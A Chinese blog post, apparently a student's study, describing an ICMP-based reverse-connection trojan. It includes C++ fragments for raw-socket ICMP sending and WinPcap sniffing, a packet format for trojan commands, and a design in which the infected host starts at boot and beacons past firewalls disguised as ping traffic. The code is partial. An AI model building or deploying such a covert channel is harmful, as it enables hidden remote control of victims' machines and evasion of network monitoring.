基于ICMP的反弹式木马研究与实现

基于ICMP的反弹式木马研究与实现

ICMP木马技术最初是为了摆脱端口的束缚而出现，与TCP和UDP协议不同，ICMP并没有端口字段，因为ICMP报文是通过系统内核或进程直接进行。这样，木马的服务器端和木马的客户端的通信采用ICMP协议时，木马的服务器不用开方任何端口。一般意义上的ICMP木马，其实就类似与一个Ping的过程。
传统的木马都是利用一个TCP端口来监听控制端的连接，一旦控制端认证通过，攻击者便会对服务器进行非法控制，但这种方式的隐蔽性非常弱。因此有人提出了反弹窗口式木马，也就是服务器主动向被控制端发送连接请求。

一：ICMP通信的实现
1.1原始套接字的工作原理与规则：
原始套接字是一个特殊的套接字类型，他的创建方式跟TCP/UDP的创建方法几乎类似：
SOCKET socket=socket（AF_INET，SOCK_RAW，IPPRPTO_ICMP）//这说明创建的是一个基于ICMP协议的原始套接字。原始套接字能够访问传输层以下的数据，也就是说，你能够实现上至应用层的数据操作，下至链路层的数据操作。
sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_IP))//用这个方式创建的原始套接字就能够直接读取链路层的数据。

(1)：对于UDP/TCP产生的IP数据包,内核不将它传递给任何原始套接字,而只是将这些数据交给对应的UDP/TCP数据处理句柄(所以,如果你想要通过原始套接字来访问TCP/UDP或
者其它类型的数据,调用socket函数创建原始套接字第三个参数应该指定为htons(ETH_P_IP),
也就是通过直接访问数据链路层来实现.
(2)：对于ICMP和EGP等使用IP数据包承载数据但又在传输层之下的协议类型的IP
数据包,内核不管是否已经有注册了的句柄来处理这些数据,都会将这些IP数据包复制一份传递给协议类型匹配的原始套接字
(3):对于不能识别协议类型的数据包,内核进行必要的校验,然后会查看是否有类型匹配的原始套接字负责处理这些数据,如果有的话,就会将这些IP数据包复制一份传递给匹配的原始套接字,否则,内核将会丢弃这个IP数据包并返回一个ICMP主机不可达的消息给源主机
(4)如果原始套接字bind绑定了一个地址，核心只将目的地址为本机IP地址的数包传递给原始套接字,如果某个原始套接字没有bind地址,核心就会把收到的所有IP数据包发给这个原始套接字
(5): 如果原始套接字调用了connect函数,则核心只将源地址为connect连接的IP地址的IP数据包传递给这个原始套接字
(6):如果原始套接字没有调用bind和connect函数,则核心会将所有协议匹配的IP数据包传递给这个原始套接字

1.2:利用原始套接字发送ICMP消息
由于操作系统的关系，创建一个原始套接字必须运行在管理员权限之下，因此，本程序全部运行在管理员模式。

WORD wVersion=MAKEWORD(2,2);
    WSADATA wsaData;
    WSAStartup(wVersion,&wsaData);
    if (LOBYTE(wsaData.wVersion)!=2||HIBYTE(wsaData.wVersion)!=2)
    {
        WSACleanup();
        return -1;
    }
    addr.sin_family=AF_INET;
    addr.sin_addr.S_un.S_addr=inet_addr(dstIp.c_str());
    addr.sin_port=0;
    sock=socket(AF_INET,SOCK_RAW,IPPROTO_ICMP);//创建原始套接字，设置为icmp类型 
    rst=setsockopt(sock,SOL_SOCKET,SO_SNDTIMEO,(char*)&outTime,sizeof(int));//设置发送超时
    if (SOCKET_ERROR==rst)
    {
        cout<<"set outtime error"<<endl;
        WSACleanup();
        return -2;
    }
.
int count=1;//设置发送的次数
    int len=sizeof(sockaddr);
    while (count--)
    {
        ICMPHDR *icmp=new ICMPHDR;//ICMPHDR 定义的ICMP头格式
        memset(icmp,0,sizeof(icmp));
        FillIcmp(icmp);  //用来初始化填充ICMP报文

        SOCKADDR_IN addrFrom;
        int nLen=sizeof(addrFrom);

        icmp->icmp_type=8;//类型为8
        icmp->icmp_code=0;//代表我是发送ping回复
        icmp->icmp_sequence=5678;//证明这是我的木马。
        strcpy_s(icmp->data,str.c_str()); //附带的数据
        icmp->icmp_checksum = CheckSum((USHORT*)icmp, sizeof(ICMPHDR)); //进行ICMP的校验

        int result;
        result = sendto(sock,(char*)icmp, sizeof(ICMPHDR),0,(SOCKADDR*)&addr,sizeof(SOCKADDR)); //向目标主机发送icmp请求包，也就得到这服务器的ip地址。
        if (SOCKET_ERROR == result)
        {
            if (WSAETIMEDOUT == WSAGetLastError())
            {
                cout << "send time out" << endl;
                continue;
            }
            else
            {
                cout << "sendto error" << endl;
                closesocket(sock);
                WSACleanup();
                return -1;
            }
        }
    }

**这样就可以发送一条ICMP消息了。
但是在这里遇到了一个问题，希望能有大神给解答一下。 我在B电脑上创
建一个ICMP的套接字，为什么收不到A电脑发送的ICMP报文，通过抓包分析，A电脑发送的ICMP报文正确到达了B电脑，为什么这个原始套接字不能捕获这条ICMP报文。也正是由于这个原因， 我在下面服务器和客户端的ICMP报文接收中，使用的捕获数据链路层的包来分析ICMP的内容，这实在是一个巨大的遗憾！！**

1.3 接收ICMP消息
由于上述的原因，我并没有成功的直接接收到ICMP报文，因此，我转而通过嗅探的方法来捕获到达的ICMP报文，为了方便，这里使用了wincap来进行。大家也可以使用基于数据链路层的原始套接字来捕获ICMP消息，如果谁有更好的方法，请不吝赐教。
关键代码如下：

if ((devHandle=pcap_open_live(d->name,1600,1,1,er))==NULL)//d-namp为网卡的描述符，1600为缓冲区的大小，适当大小的缓冲区有利于提高响应的速度，1为将网卡置于混杂模式，1为响应的时间为1ms，具体参数的定义大家可以自行百度
    {
        pcap_freealldevs(alldevs);  
        return false;
    }
    if (pcap_datalink(devHandle)!=DLT_EN10MB)
    {
        AfxMessageBox(_T("不是以太网"));
        pcap_freealldevs(alldevs);  
        return false;
    }

    m_ThreadHandle=AfxBeginThread((AFX_THREADPROC)MyProc,this);

while (1)
    {
        pcap_next_ex(pThis->devHandle, &header, &pkt_data);//pkt__data即为捕获到的所有数据，大家可已根据IP和ICMP报文的格式进行分析，我就不再赘述
        datapkt *data = new datapkt;      
        memset(data,0,sizeof(data));
        if(NULL == data)  
        {  
            AfxMessageBox(_T("空间已满，无法接收新的数据包"));  
            return ;  
        }  
        if(pThis->analyze_frame(pkt_data,data)<0)  
        {
            delete data;
            continue;
        }
        else
        {
            pThis->recvMSG(data);//得到了接收到的icmp消息 
            delete data;
        }
    }

二：通信数据格式的定义

互联网上的数据都有一定的格式，我们的木马程序使用的数据格式如下：这只是一个最简单的实现，可根据实际的需要设置自己的数据格式。
ICMP数据报格式：
8位类型码 8位代码 16校验和
16位标志位 16位序号
8位操作类型 最长1024位数据可选

其中，服务端发送的是类型码为8，代码为0的ICMP消息，这会被计算机理解为一个ping请求，故一般不会被防火墙拦截。
客户端发送的是类型码为0，代码为0的ICMP消息，这是一个ping回复。
16位标志位代表发送这个ICMP报文的进程号，
16位序号代表这个ICMP报文的序号，可以用来组装附加的数据
8位操作类型的定义如下：

三：服务器的实现
服务端和客户端的实现比较简单。服务端即被控制端。当被控制端开机，服务器会伴随启动，并发送ICMP请求给客户端，也就是发送操作类型为请求连接的ICMP消息给客户端，客户端收到这个消息以后，若同意，会发送ICMP连接确认，告诉被控主机。这时，就会建立起ICMP连接。其中，正常的ICMP消息和木马的ICMP消息，我是使用16位的标志位来标志这是属于我木马的ICMP消息。
四：客户端的实现
客户端更为简单，大家有疑问可以留言。

转载于:https://www.cnblogs.com/shirelyme/p/4461523.html